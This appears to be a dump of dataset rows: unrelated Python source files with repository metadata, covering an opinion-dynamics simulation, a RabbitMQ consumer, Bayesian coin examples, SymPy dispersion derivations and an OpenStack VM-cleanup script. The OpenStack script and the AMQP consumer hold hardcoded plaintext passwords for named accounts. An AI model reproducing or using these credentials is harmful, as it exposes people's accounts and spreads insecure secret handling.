def __init__(self, distribution: str = 'uniform', scaling_factor = None, uncertainty_moderates = None, num_features = None, **kwargs):
if num_features is not None:
self.num_features = num_features
else:
warnings.warn("Number of features not specified, using 1 as default")
self.num_features = 1
if scaling_factor is not None:
self.factor = scaling_factor
else:
warnings.warn("Scaling factor not specified, using 1 as default")
self.factor = 1
if uncertainty_moderates is not None:
self.uncertainty_moderates = uncertainty_moderates
else:
warnings.warn("Uncertainty not specified, using 1 as default")
self.uncertainty_moderates = 0.6
self.distribution = distribution
def initialize_attributes(self, network: nx.Graph, **kwargs):
offset = 0.5 - (self.factor / 2)
for agent in network.nodes:
network.nodes[agent]['uncertainty'] = self.uncertainty_moderates
for i in range(self.num_features):
name = 'f' + str("%02d" % (i + 1))
ds.set_continuous_attribute(network, name, distribution = self.distribution)
for i in network.nodes(): # iterate over all nodes
network.nodes[i][name] = network.nodes[i][name] * self.factor + offset # scale by factor
# custom initializer in which initial range can be varied
class ExtremeScaledInitializer(ds.RandomContinuousInitializer):
def __init__(self, distribution: str = 'uniform', scaling_factor = None, uncertainty_moderates = None, num_features = None, **kwargs):
if num_features is not None:
self.num_features = num_features
else:
warnings.warn("Number of features not specified, using 1 as default")
self.num_features = 1
if scaling_factor is not None:
self.factor = scaling_factor
else:
warnings.warn("Scaling factor not specified, using 1 as default")
self.factor = 1
if uncertainty_moderates is not None:
self.uncertainty_moderates = uncertainty_moderates
else:
warnings.warn("Uncertainty not specified, using 1 as default")
self.uncertainty_moderates = 0.6
self.distribution = distribution
def initialize_attributes(self, network: nx.Graph, **kwargs):
offset = 0.5 - (self.factor / 2)
for agent in network.nodes:
network.nodes[agent]['uncertainty'] = self.uncertainty_moderates
for i in range(self.num_features):
name = 'f' + str("%02d" % (i + 1))
for i in network.nodes(): # iterate over all nodes
network.nodes[i][name] = random.choice([0, 1]) * self.factor + offset # scale by factor
from defSim import InfluenceOperator
from defSim.tools.NetworkDistanceUpdater import update_dissimilarity
from defSim.dissimilarity_component.dissimilarity_calculator import DissimilarityCalculator
from typing import List
class FlacheMacyInfluence(InfluenceOperator):
def __init__(self, regime = 'many-to-one', modifiers = ["smooth"], noise_strength = 0):
self.regime = regime
self.modifiers = modifiers
self.noise_strength = noise_strength
def spread_influence(self,
network: nx.Graph,
agent_i: int,
agents_j: List[int] or int,
regime: str,
dissimilarity_measure: DissimilarityCalculator,
attributes: List[str] = None,
**kwargs) -> bool:
"""
"""
negative_weights = kwargs.get("allow_negative_weights", False)
if dissimilarity_measure is None:
dissimilarity_measure = ds.ManhattanDistance(exclude = ['uncertainty'])
if self.regime not in ['many-to-one', 'one-to-one']:
raise NotImplementedError('Only many-to-one influence is implemented based on Flache & Macy 2011')
if attributes is None:
# if no specific attributes were given, take all of them
attributes = [feature for feature in list(network.nodes[agent_i].keys()) if feature != "uncertainty"]
# check modifiers
if type(self.modifiers) != list:
self.modifiers = [self.modifiers]
if not all([modifier in ["influence_off", "smooth", "stubborn", "states_and_weights", "all_states", "noise_all_features"] for modifier in self.modifiers]):
warnings.warn("Unrecognized modifier in __class__.")
# variable to return at the end of function
success = False
# In every step, the selected agent either updates the weights (distances)
# or gets influenced on a randomly selected state
if 'states_and_weights' in self.modifiers:
update_state = True
update_weights = True
else:
update_weights_and_not_state = random.choice([True, False])
update_weights = update_weights_and_not_state
update_state = not update_weights_and_not_state
if 'all_states' in self.modifiers:
update_all_states = True
else:
update_all_states = False
# turn influence off, leaving only noise?
influence_off = 'influence_off' in self.modifiers
# apply noise to all features together
noise_all_features = 'noise_all_features' in self.modifiers
if noise_all_features and not update_all_states:
warnings.warn("Applying noise to all features, but only one feature updated each step")
if update_weights:
# NOTE: because defSim assumes undirected networks, and distance is an edge
# attribute, distances are updated for i --> j and j --> i simultaneously
update_dissimilarity(network, [agent_i], dissimilarity_measure)
#success = True
if update_state:
if update_all_states:
influenced_features = attributes
else:
influenced_features = [random.choice(attributes)]
warnings.warn("Influenced features == {}".format(influenced_features))
if noise_all_features:
if self.noise_strength > 0:
noise_value = np.random.normal(scale = self.noise_strength) # TS18 use normal, with sd to scale noise
else:
noise_value = 0
for influenced_feature in influenced_features:
#print("Influenced feature: {}".format(influenced_feature))
#print("Base feature value agent i: {}".format(network.nodes[agent_i][influenced_feature]))
#print("::::::::::::::::START OF INFLUENCE::::::::::::::::")
# in case of one-to-one, j is only one agent, but we still want to iterate over it
if type(agents_j) != list:
agents_j = [agents_j]
set_of_influencers = agents_j
#print("Influence from neighbors: {}".format(set_of_influencers))
if len(set_of_influencers) != 0:
# Weights based on Flache & Macy 2011 Equation 1 / 1a
# Based on attribute distance between agents, under the assumption that these
# distances are calculated as Manhattan distance scaled by number of features
# Both equations are adjusted for the [0,1] opinion scale in defSim, as opposed
# to the [-1, 1] opinion scale in Flache & Macy 2011
# Maximum distance between agents is 1. Maximally distant agents have weight 0
# if negative weights are not allowed, else -1
if negative_weights:
weights = [1 - (2 * network.edges[agent_i, agent_j]['dist']) for agent_j in set_of_influencers]
else:
weights = [1 - (network.edges[agent_i, agent_j]['dist']) for agent_j in set_of_influencers]
# Raw state change of agent i's opinion on the selected influenced feature
# based on weights and differences for each neighbor (Equation 2)
feature_differences = [network.nodes[agent_j][influenced_feature] - network.nodes[agent_i][influenced_feature] for agent_j in set_of_influencers]
weighted_feature_differences = [weights[i] * feature_differences[i] for i in range(len(set_of_influencers))]
overall_state_change = sum(weighted_feature_differences) / (2 * len(set_of_influencers))
# Turn influence off completely?
if influence_off:
overall_state_change = 0 # set influence to 0, so any movement is noise
if not noise_all_features:
if self.noise_strength > 0:
noise_value = np.random.normal(scale = self.noise_strength) # TS18 use normal, with sd to scale noise
#print("noise", noise_value)
else:
noise_value = 0
overall_state_change = overall_state_change + noise_value
#print("resulting feature value", network.nodes[agent_i][influenced_feature])
###### TEST SCALING #####
overall_state_change = 2 * overall_state_change
# Apply smoothing as desired
if 'stubborn' in self.modifiers:
overall_state_change = self._apply_stubbornness(overall_state_change, target = agent_i, influenced_feature = influenced_feature, network = network)
if 'smooth' in self.modifiers or not any([adjust_function in self.modifiers for adjust_function in ['smooth', 'stubborn']]):
overall_state_change = self._apply_smoothing(overall_state_change, target = agent_i, influenced_feature = influenced_feature, network = network)
# Adjusted state of agent i's opinion on the selected influence feature
network.nodes[agent_i][influenced_feature] = network.nodes[agent_i][influenced_feature] + overall_state_change
# Bind to opinion range [0,1]
network.nodes[agent_i][influenced_feature] = min(1, max(0, network.nodes[agent_i][influenced_feature]))
success = True
#print("::::::::::::::::END OF INFLUENCE::::::::::::::::")
return success
def _apply_smoothing(self, overall_state_change, target, influenced_feature, network):
# based on Equation 2a with Corrigendum 2017
if overall_state_change > 0:
overall_state_change = (overall_state_change * (1 - network.nodes[target][influenced_feature]))
else:
overall_state_change = (overall_state_change * (0 + network.nodes[target][influenced_feature]))
return overall_state_change
def _apply_stubbornness(self, overall_state_change, target, influenced_feature, network):
# based on Equation 2a WITHOUT Corrigendum 2017
if network.nodes[target][influenced_feature] > 0.5:
overall_state_change = (overall_state_change * (1 - network.nodes[target][influenced_feature]))
else:
overall_state_change = (overall_state_change * (0 + network.nodes[target][influenced_feature]))
return overall_state_change
# Implementing an output reporter which calculates polarization at the end of each run
## Output reporters are implemented based on the OutputTableCreator base class https://github.com/marijnkeijzer/defSim/blob/master/defSim/tools/CreateOutputTable.py
## Every output reporter should implement a static method called 'create_output', which calculates and returns the desired output
## Give the reporter a label if you want to customize the column name in the output
## Examples: https://github.com/marijnkeijzer/defSim/blob/master/defSim/tools/OutputMeasures.py
class PolarizationReporter(ds.tools.CreateOutputTable.OutputTableCreator):
label = "Polarization"
@staticmethod
def create_output(network: nx.Graph, distance = "Manhattan", **kwargs):
"""
Will calculate polarization for a given network.
Polarization is based on the observed variance in opinion distances.
Opinion distances are based on a euclidean distance across all features of the agents.
We recalculate these distances here because during the simulation these distances are only calculated
between directly connected agents.
:param network: A networkx graph on which to calculate polarization
:param distance: Whether to use distance calculation from original study ("FlacheMacy") or
euclidean distance ("euclidean")
:return: A single value for polarization, between 0 and 1.
"""
distances = []
agents = list(network.nodes())
exclude = kwargs.get('exclude_polarization', ['uncertainty'])
# for each agent calculate distances to other agents
# omit last agent, since it has no new agents to compare with
for agent1_id in agents[:-1]:
agent1_attributes = np.array([v for k, v in network.nodes[agent1_id].items() if k not in exclude])
# each combination of agents should be calculated once,
# so omit agents which come before agent1 in the list
# self-distances are also omitted
for agent2_id in agents[agents.index(agent1_id + 1):]:
agent2_attributes = np.array([v for k, v in network.nodes[agent2_id].items() if k not in exclude])
# calculate average distance across all features
distance_pairs = abs(agent2_attributes - agent1_attributes)
distances.append(sum(distance_pairs) / len(distance_pairs))
# return variance of distances
return np.var(distances)
class SimulationWithNewTies(ds.Simulation):
def run_simulation(self, initialize: bool = True):
"""
This method initializes the network if none is given, initializes the attributes of the agents, and also
computes and sets the distances between each neighbor.
It then calls different functions that execute the simulation based on which stop criterion was selected.
:param bool=True initialize: Initialize the simulation before running (disable if initialization was
done separately)
:returns: A Pandas DataFrame that contains one row of data. To see what output the output contains see
:func:`~create_output_table`
"""
if initialize:
self.initialize_simulation()
if self.influence_function == 'list':
self.influence_function = self.parameter_dict['influence_function']
if 'initialize_uncertainty' in self.parameter_dict:
if self.parameter_dict['initialize_uncertainty']:
for agent in self.network.nodes:
self.network.nodes[agent]['uncertainty'] = 1 - abs(self.network.nodes[agent]['f01'] - 0.5)
if all([ties_parameter in self.parameter_dict.keys() for ties_parameter in ['new_ties_probability', 'new_ties_in_iteration']]):
new_ties_probability = self.parameter_dict['new_ties_probability']
new_ties_in_iteration = self.parameter_dict['new_ties_in_iteration']
for iteration in range(new_ties_in_iteration):
self.run_simulation_step()
NewTiesModifier(new_ties_probability = new_ties_probability).rewire_network(self.network)
self.dissimilarity_calculator.calculate_dissimilarity_networkwide(self.network)
if self.stop_condition == "pragmatic_convergence":
self._run_until_pragmatic_convergence()
elif self.stop_condition == "strict_convergence":
self._run_until_strict_convergence()
elif self.stop_condition == "max_iteration":
self.max_iterations = self.max_iterations - new_ties_in_iteration
self._run_until_max_iteration()
else:
raise ValueError("Can only select from the options ['pragmatic_convergence', 'strict_convergence', 'max_iteration']")
return self.create_output_table() | [
"diekobakker@hotmail.com"
] | diekobakker@hotmail.com |
62e744b70c8b3536aaee4fc8c765a74a4202d779 | d5df2e08a1d4064d0c34db7e1e23823b44fa62fa | /workers/project/consumers/test_queue_receive.py | 7d40df75611dd81bf6eba045c7ec503faeb879c6 | [
"MIT"
] | permissive | sharof2000/ms-fastapi-template | 42c1f68f3260e8facad6984abada9f3d56363e05 | 5bbd6903305db07cc18330ec86fb04ca518e9dab | refs/heads/main | 2023-07-06T21:28:13.558790 | 2021-08-13T13:52:12 | 2021-08-13T13:52:12 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,127 | py | import asyncio
from aio_pika import connect, IncomingMessage
async def on_message(message: IncomingMessage):
"""
on_message doesn't necessarily have to be defined as async.
Here it is to show that it's possible.
"""
print(" [x] Received message %r" % message)
print("Message body is: %r" % message.body)
print("Before sleep!")
await asyncio.sleep(5) # Represents async I/O operations
print("After sleep!")
async def main(loop):
# Perform connection
connection = await connect(
"amqp://farlley_ferreira:mstemplate123@localhost:5672", loop=loop
)
# Creating a channel
channel = await connection.channel()
# Declaring queue
queue = await channel.declare_queue("hello")
# Start listening the queue with name 'hello'
await queue.consume(on_message, no_ack=True)
if __name__ == "__main__":
loop = asyncio.get_event_loop()
loop.create_task(main(loop))
# we enter a never-ending loop that waits for data and
# runs callbacks whenever necessary.
print(" [*] Waiting for messages. To exit press CTRL+C")
loop.run_forever() | [
"farlley@live.com"
] | farlley@live.com |
97e64193f5358c77e438e18a4f0c3aeff796f0e1 | 74c5d1736d53cf872a95664caccacfe324a9f5e3 | /chapter4/euro.py | f76fe1e514a6201771b2adbcc6363ecb9b734d4b | [
"Apache-2.0"
] | permissive | lmy86263/Think-Bayes | e773f474ec550dfb550763351b106f23eab4bf8d | ddf772832fe5ce9547081ebedf71fd2d9438b423 | refs/heads/master | 2020-04-29T11:44:08.226453 | 2019-01-05T10:43:39 | 2019-01-05T10:43:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,668 | py | """This file contains code for use with "Think Bayes",
by Allen B. Downey, available from greenteapress.com
Copyright 2012 Allen B. Downey
License: GNU GPLv3 http://www.gnu.org/licenses/gpl.html
"""
"""This file contains a partial solution to a problem from
MacKay, "Information Theory, Inference, and Learning Algorithms."
Exercise 3.15 (page 50): A statistical statement appeared in
"The Guardian" on Friday January 4, 2002:
When spun on edge 250 times, a Belgian one-euro coin came
up heads 140 times and tails 110. 'It looks very suspicious
to me,' said Barry Blight, a statistics lecturer at the London
School of Economics. 'If the coin were unbiased, the chance of
getting a result as extreme as that would be less than 7%.'
MacKay asks, "But do these data give evidence that the coin is biased
rather than fair?"
"""
import thinkbayes
import thinkplot
FORMATS = ['png']
class Euro(thinkbayes.Suite):
"""Represents hypotheses about the probability of heads."""
def Likelihood(self, data, hypo):
"""Computes the likelihood of the data under the hypothesis.
hypo: integer value of x, the probability of heads (0-100)
data: string 'H' or 'T'
"""
x = hypo / 100.0
if data == 'H':
return x
else:
return 1 - x
class Euro2(thinkbayes.Suite):
"""Represents hypotheses about the probability of heads."""
def Likelihood(self, data, hypo):
"""Computes the likelihood of the data under the hypothesis.
hypo: integer value of x, the probability of heads (0-100)
data: tuple of (number of heads, number of tails)
"""
x = hypo / 100.0
heads, tails = data
like = x ** heads * (1 - x) ** tails
return like
def UniformPrior():
"""Makes a Suite with a uniform prior."""
suite = Euro(range(0, 101))
return suite
def TrianglePrior():
"""Makes a Suite with a triangular prior."""
suite = Euro()
for x in range(0, 51):
suite.Set(x, x)
for x in range(51, 101):
suite.Set(x, 100 - x)
suite.Normalize()
return suite
def RunUpdate(suite, heads=140, tails=110):
"""Updates the Suite with the given number of heads and tails.
suite: Suite object
heads: int
tails: int
"""
dataset = 'H' * heads + 'T' * tails
for data in dataset:
suite.Update(data)
def Summarize(suite):
"""Prints summary statistics for the suite."""
print(suite.Prob(50))
print('MLE', suite.MaximumLikelihood())
print('Mean', suite.Mean())
print('Median', thinkbayes.Percentile(suite, 50))
print('5th %ile', thinkbayes.Percentile(suite, 5))
print('95th %ile', thinkbayes.Percentile(suite, 95))
print('CI', thinkbayes.CredibleInterval(suite, 90))
def PlotSuites(suites, root):
"""Plots two suites.
suite1, suite2: Suite objects
root: string filename to write
"""
thinkplot.Clf()
thinkplot.PrePlot(len(suites))
thinkplot.Pmfs(suites)
thinkplot.Save(root=root,
xlabel='x',
ylabel='Probability',
formats=FORMATS)
def main():
# make the priors
suite1 = UniformPrior()
suite1.name = 'uniform'
suite2 = TrianglePrior()
suite2.name = 'triangle'
# plot the priors
PlotSuites([suite1, suite2], 'euro2')
# update
RunUpdate(suite1)
Summarize(suite1)
RunUpdate(suite2)
Summarize(suite2)
# plot the posteriors
PlotSuites([suite1], 'euro1')
PlotSuites([suite1, suite2], 'euro3')
if __name__ == '__main__':
main()
| [
"foamliu@yeah.net"
] | foamliu@yeah.net |
08064990a0dcafa4325234669d80f5cbe88b2e77 | 17b13a3ea2dae8af3a2e1ba5870af327864c82c3 | /PIPCamTest.py | 26bfd1d5ed94fb5190a90f191b78b256bb8b9596 | [] | no_license | yfaney/PIPCam | 4ffc5fa0841605b74eceb4481367684a3d5bf66a | ee5d4ad83e909a599696d4d81132da1f556517c2 | refs/heads/master | 2021-01-19T17:44:26.914342 | 2015-08-28T00:00:50 | 2015-08-28T00:00:50 | 37,951,330 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 183 | py | #!/usr/bin/python
import time
import picamera
with picamera.PiCamera() as camera:
camera.resolution = (1024, 768)
camera.start_preview()
time.sleep(2)
camera.capture('foo.jpg')
| [
"yfaney@gmail.com"
] | yfaney@gmail.com |
41e96ff1b900bad193ede0a539a9524362b80c2c | ec772836e4c7a3cc19d9a7d1efabc841de58c548 | /clear_all.py | c6b289ddbab306dae258cc3f3c616c53947640cb | [] | no_license | life1347/cloudsproject | 173c23b1cb4758579c8a8853c5ba6e459f3a0712 | c8d485ed3780dd66b73fe2a0c95dc387ed63b28f | refs/heads/master | 2021-06-04T03:28:04.147098 | 2014-01-08T10:37:33 | 2014-01-08T10:37:33 | 14,948,469 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,559 | py | import time
import string
import logging
from time import sleep, asctime
from keystoneclient.v2_0 import client as ksclient
from neutronclient.v2_0 import client as neclient
from novaclient.v1_1 import client as nclient
import novaclient.exceptions as nova_exc
logging.basicConfig(level=logging.INFO)
#logging.basicConfig(level=logging.DEBUG)
KEYSTONE_URL='https://openstack.nctu.edu.tw/keystone/v2.0'
username = ['0256547','0256081','0256017','0156153']
password = ['03067','2','persevere80419@gmail.com','swluo@cs.nctu.edu.tw']
tenant_name=['CloudOS2013_0256547','CloudOS2013_0256081','CloudOS2013_0256017','CloudOS2013_0156153']
def delete_all_vm(now):
ne=neclient.Client(auth_url=KEYSTONE_URL, username = username[now], tenant_name = tenant_name[now], password = password[now], insecure = True)
nc=nclient.Client(auth_url=KEYSTONE_URL, username = username[now], api_key = password[now], project_id=tenant_name[now],service_type='compute', insecure = True)
servers=nc.servers.list()
num=len(servers)
i=0
while i<num:
if string.split(servers[i].name,'_')[0] == 'VM':
print 'Delete %s'%servers[i].name
try:
nc.servers.delete(servers[i].id)
except:
pass
i=i+1
def delete_network(now):
ne=neclient.Client(auth_url=KEYSTONE_URL, username = username[now], tenant_name = tenant_name[now], password = password[now], insecure = True)
nc=nclient.Client(auth_url=KEYSTONE_URL, username = username[now], api_key = password[now], project_id=tenant_name[now],service_type='compute', insecure = True)
router_name = username[now] + '_router'
network_name = username[now] + '_network'
subnet_name = username[now] + '_subnet'
if ne.list_networks(name = network_name):
try:
router1 = ne.list_routers(name = router_name)
router1_id = router1['routers'][0]['id']
sub = ne.list_subnets(name = subnet_name)
sub_id = sub['subnets'][0]['id']
ne.remove_interface_router(router1_id,{'subnet_id': sub_id})
ne.delete_router(router1_id)
ne.delete_network(ne.list_networks(name= network_name)['networks'][0]['id'])
except:
pass
delete_all_vm(2)
delete_network(2)
| [
"persevere80419@gmail.com"
] | persevere80419@gmail.com |
3bad1f5d7a9cbe455fa5ede29a60ec085415bb3a | 716b26f5e6dda95be2d3c6106939b0c114037e96 | /Sympy/ideal_bar_model_and_numerical_dispersion_relationships_via_sympy.py | 2530a20cba8fa067637aa6749fd8656fa2f85ba8 | [] | no_license | mariusono/Physical-Modelling-of-Spring-Reverberation | 66ab0bf0b23dfda035f92cbfc1a76ea1e2a7d528 | 16ae5b74a6ecad37f7f3ec8a034090e1f291421a | refs/heads/master | 2023-03-08T03:15:50.272602 | 2021-02-25T10:08:14 | 2021-02-25T10:08:14 | 267,653,783 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,508 | py | # -*- coding: utf-8 -*-
"""
Created on Fri May 29 00:06:29 2020
@author: MSOI
"""
from sympy import *
import numpy as np
import matplotlib.pyplot as plt
import re
import copy
I,eta,Kappa,k,Dxx,u,Dxxxx,q_slash,q,gamma,alpha,sig_t,sig_l,Dxmin,Dxpl,zeta,theta,Mx,sig_0,sig_1 = symbols('I,eta,Kappa,k,Dxx,u,Dxxxx,q_slash,q,gamma,alpha,sig_t,sig_l,Dxmin,Dxpl,zeta,theta,Mx,sig_0,sig_1')
U,Z,beta = symbols('U,Z,beta')
z,w,x,t,beta,K,k,mu,h = symbols('z,w,x,t,beta,K,k,mu,h')
from sympy import I
u_lm0_nm0,u_lm0_nm1,u_lm0_nm2,u_lm1_nm0,u_lm1_nm1,u_lm1_nm2,u_lm2_nm0,u_lm2_nm1,u_lm2_nm2,u_lp0_np0,u_lp0_np1,u_lp0_np2,u_lp1_np0,u_lp1_np1,u_lp1_np2,u_lp2_np0,u_lp2_np1,u_lp2_np2,zeta_lm0_nm0,zeta_lm0_nm1,zeta_lm0_nm2,zeta_lm1_nm0,zeta_lm1_nm1,zeta_lm1_nm2,zeta_lm2_nm0,zeta_lm2_nm1,zeta_lm2_nm2,zeta_lp0_np0,zeta_lp0_np1,zeta_lp0_np2,zeta_lp1_np0,zeta_lp1_np1,zeta_lp1_np2,zeta_lp2_np0,zeta_lp2_np1,zeta_lp2_np2 = symbols('u_lm0_nm0,u_lm0_nm1,u_lm0_nm2,u_lm1_nm0,u_lm1_nm1,u_lm1_nm2,u_lm2_nm0,u_lm2_nm1,u_lm2_nm2,u_lp0_np0,u_lp0_np1,u_lp0_np2,u_lp1_np0,u_lp1_np1,u_lp1_np2,u_lp2_np0,u_lp2_np1,u_lp2_np2,zeta_lm0_nm0,zeta_lm0_nm1,zeta_lm0_nm2,zeta_lm1_nm0,zeta_lm1_nm1,zeta_lm1_nm2,zeta_lm2_nm0,zeta_lm2_nm1,zeta_lm2_nm2,zeta_lp0_np0,zeta_lp0_np1,zeta_lp0_np2,zeta_lp1_np0,zeta_lp1_np1,zeta_lp1_np2,zeta_lp2_np0,zeta_lp2_np1,zeta_lp2_np2')
u_lm0_np0,u_lm0_np1,u_lm0_np2,u_lm1_np0,u_lm1_np1,u_lm1_np2,u_lm2_np0,u_lm2_np1,u_lm2_np2,u_lp0_nm0,u_lp0_nm1,u_lp0_nm2,u_lp1_nm0,u_lp1_nm1,u_lp1_nm2,u_lp2_nm0,u_lp2_nm1,u_lp2_nm2,zeta_lm0_np0,zeta_lm0_np1,zeta_lm0_np2,zeta_lm1_np0,zeta_lm1_np1,zeta_lm1_np2,zeta_lm2_np0,zeta_lm2_np1,zeta_lm2_np2,zeta_lp0_nm0,zeta_lp0_nm1,zeta_lp0_nm2,zeta_lp1_nm0,zeta_lp1_nm1,zeta_lp1_nm2,zeta_lp2_nm0,zeta_lp2_nm1,zeta_lp2_nm2 = symbols('u_lm0_np0,u_lm0_np1,u_lm0_np2,u_lm1_np0,u_lm1_np1,u_lm1_np2,u_lm2_np0,u_lm2_np1,u_lm2_np2,u_lp0_nm0,u_lp0_nm1,u_lp0_nm2,u_lp1_nm0,u_lp1_nm1,u_lp1_nm2,u_lp2_nm0,u_lp2_nm1,u_lp2_nm2,zeta_lm0_np0,zeta_lm0_np1,zeta_lm0_np2,zeta_lm1_np0,zeta_lm1_np1,zeta_lm1_np2,zeta_lm2_np0,zeta_lm2_np1,zeta_lm2_np2,zeta_lp0_nm0,zeta_lp0_nm1,zeta_lp0_nm2,zeta_lp1_nm0,zeta_lp1_nm1,zeta_lp1_nm2,zeta_lp2_nm0,zeta_lp2_nm1,zeta_lp2_nm2')
## Test on 1d wave
expr = diff(U*exp(I*(w*t+beta*x)),t,t) - gamma**2*( diff(U*exp(I*(w*t+beta*x)),x,x) )
expr = expr.subs(U,1)
#expr.rewrite(sin)
sols = solve(expr,w)
## Test on the ideal bar
## Analytical:
expr = diff(U*exp(I*(w*t+beta*x)),t,t) + K**2*( diff(U*exp(I*(w*t+beta*x)),x,x,x,x) )
expr = expr.subs(U,1)
#expr.rewrite(sin)
sols = solve(expr,w)
expr = diff(U*exp(I*(w*t+beta*x)),t,t) + K**2*( diff(U*exp(I*(w*t+beta*x)),x,x,x,x) )
expr = expr.subs(U,1)
#expr.rewrite(sin)
sols = solve(expr,w)
## Explitict FDS:
expr_u = u_lm0_np1 - ( (2-6*mu**2)*u_lm0_nm0 + 4*mu**2*(u_lp1_nm0+u_lm1_nm0) - mu**2*(u_lp2_nm0+u_lm2_nm0) - u_lm0_nm1 )
expr_u = expr_u.subs(u_lm0_nm0,U*z**0*exp(0*I*beta*h))
expr_u = expr_u.subs(u_lm0_nm1,U*z**-1*exp(0*I*beta*h))
expr_u = expr_u.subs(u_lm0_np1,U*z**1*exp(0*I*beta*h))
expr_u = expr_u.subs(u_lm1_nm0,U*z**0*exp(-1*I*beta*h))
expr_u = expr_u.subs(u_lm1_nm1,U*z**-1*exp(-1*I*beta*h))
expr_u = expr_u.subs(u_lm1_np1,U*z**1*exp(-1*I*beta*h))
expr_u = expr_u.subs(u_lp1_nm0,U*z**0*exp(1*I*beta*h))
expr_u = expr_u.subs(u_lp1_nm1,U*z**-1*exp(1*I*beta*h))
expr_u = expr_u.subs(u_lp1_np1,U*z**1*exp(1*I*beta*h))
expr_u = expr_u.subs(u_lm2_nm0,U*z**0*exp(-2*I*beta*h))
expr_u = expr_u.subs(u_lm2_nm1,U*z**-1*exp(-2*I*beta*h))
expr_u = expr_u.subs(u_lm2_np1,U*z**1*exp(-2*I*beta*h))
expr_u = expr_u.subs(u_lp2_nm0,U*z**0*exp(2*I*beta*h))
expr_u = expr_u.subs(u_lp2_nm1,U*z**-1*exp(2*I*beta*h))
expr_u = expr_u.subs(u_lp2_np1,U*z**1*exp(2*I*beta*h))
expr_u = expr_u.subs(U,1)
expr_u.rewrite(sin)
expr_toSolve = expr_u.rewrite(sin)
expr_toSolve = expr_toSolve.subs(z,exp(I*w*k))
#expr_toSolve.evalf(subs={K:K_val,mu:mu_val,k:k_val,h:h_val,beta:50,w:380*2*np.pi})
expr_toSolve = expr_toSolve.rewrite(sin)
sols = solve(expr_toSolve,w)
## Implcit FDS:
expr_u = theta*(1/k**2)*(u_lm0_np1 - 2*u_lm0_nm0 + u_lm0_nm1) \
+ (1-theta)*0.5*((1/k**2)*(u_lp1_np1-2*u_lp1_nm0+u_lp1_nm1)+(1/k**2)*(u_lm1_np1-2*u_lm1_nm0+u_lm1_nm1)) \
+ K**2*(1/h**4)*(u_lp2_nm0 - 4*u_lp1_nm0 + 6*u_lm0_nm0 - 4*u_lm1_nm0 + u_lm2_nm0)
expr_u = expr_u.subs(u_lm0_nm0,U*z**0*exp(0*I*beta*h))
expr_u = expr_u.subs(u_lm0_nm1,U*z**-1*exp(0*I*beta*h))
expr_u = expr_u.subs(u_lm0_np1,U*z**1*exp(0*I*beta*h))
expr_u = expr_u.subs(u_lm1_nm0,U*z**0*exp(-1*I*beta*h))
expr_u = expr_u.subs(u_lm1_nm1,U*z**-1*exp(-1*I*beta*h))
expr_u = expr_u.subs(u_lm1_np1,U*z**1*exp(-1*I*beta*h))
expr_u = expr_u.subs(u_lp1_nm0,U*z**0*exp(1*I*beta*h))
expr_u = expr_u.subs(u_lp1_nm1,U*z**-1*exp(1*I*beta*h))
expr_u = expr_u.subs(u_lp1_np1,U*z**1*exp(1*I*beta*h))
expr_u = expr_u.subs(u_lm2_nm0,U*z**0*exp(-2*I*beta*h))
expr_u = expr_u.subs(u_lm2_nm1,U*z**-1*exp(-2*I*beta*h))
expr_u = expr_u.subs(u_lm2_np1,U*z**1*exp(-2*I*beta*h))
expr_u = expr_u.subs(u_lp2_nm0,U*z**0*exp(2*I*beta*h))
expr_u = expr_u.subs(u_lp2_nm1,U*z**-1*exp(2*I*beta*h))
expr_u = expr_u.subs(u_lp2_np1,U*z**1*exp(2*I*beta*h))
expr_u = expr_u.subs(U,1)
#expr_u = expr_u.subs(z,exp(I*w*k))
#sols = solve(expr_u,w) # not working ?
# # Better:
expr_u.rewrite(sin)
expr_toSolve = expr_u.rewrite(sin)
#expr_toSolve = expr_u
expr_toSolve = expr_toSolve.subs(z,exp(I*w*k))
#expr_toSolve.evalf(subs={K:K_val,mu:mu_val,k:k_val,h:h_val,beta:50,w:380*2*np.pi})
expr_toSolve = expr_toSolve.rewrite(sin)
sols = solve(expr_toSolve,w)
| [
"59313470+mariusono@users.noreply.github.com"
] | 59313470+mariusono@users.noreply.github.com |
3590fd67f1a1026d541efc28898722aa22b077ac | aa8925ae04ed5d22c54450b0fb9e7e982c915f59 | /setup.py | b79340e80deb87462a024bfa580cf918addbec90 | [
"MIT"
] | permissive | khezen/maildesk | e1e1fe64d811c7e971b4575f8cf3a82e01dcc0d7 | 03c33fcac86af9d569373367e0493f3458acbb04 | refs/heads/master | 2022-11-21T11:24:33.062901 | 2020-07-24T06:48:10 | 2020-07-24T06:48:10 | 279,969,466 | 7 | 0 | null | null | null | null | UTF-8 | Python | false | false | 638 | py | import setuptools
with open("README.md", "r") as fh:
long_description = fh.read()
setuptools.setup(
name="maildesk",
version="0.1.1",
author="Guillaume Simonneau",
author_email="simonneaug@gmail.com",
description="email python library",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/khezen/maildesk",
packages=setuptools.find_packages(),
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
python_requires='>=2.7',
) | [
"simonneaug@gmail.com"
] | simonneaug@gmail.com |
58a14ee15f12ae43103a3a8bc7bc5809c4589a56 | 8af5f03574346188cba118963f205756f308c0c5 | /c2py/objects_manager.py | 64360a8538a099abc051171ffee4fad31c494f04 | [] | no_license | nanoric/c2py | 4030a03b87a0bb413f81ba0f4ff0a5407ec5d4fc | ff272c8c31d969ea8c7dbd6a904414de02f715d4 | refs/heads/master | 2023-07-21T20:48:14.457559 | 2023-07-14T06:58:13 | 2023-07-14T06:58:13 | 165,370,817 | 62 | 7 | null | 2019-10-15T06:37:20 | 2019-01-12T09:38:02 | C | UTF-8 | Python | false | false | 1,118 | py | from c2py.core.core_types.generator_types import GeneratorSymbol, GeneratorTypedef
class ObjectManager(dict):
def __setitem__(self, key: str, value: "GeneratorSymbol"):
if self.__contains__(key):
v = self.__getitem__(key)
if v is None:
return super().__setitem__(key, value)
if not isinstance(v, GeneratorTypedef) and isinstance(value, GeneratorTypedef):
# handle special case: typedef enum/struct Name{} Name;
return # don't use a typedef to override original type
super().__setitem__(key, value)
def __getitem__(self, key: str) -> "GeneratorSymbol":
while key.startswith('::'):
key = key[2:]
return super().__getitem__(key)
def __contains__(self, key: str):
while key.startswith('::'):
key = key[2:]
return super().__contains__(key)
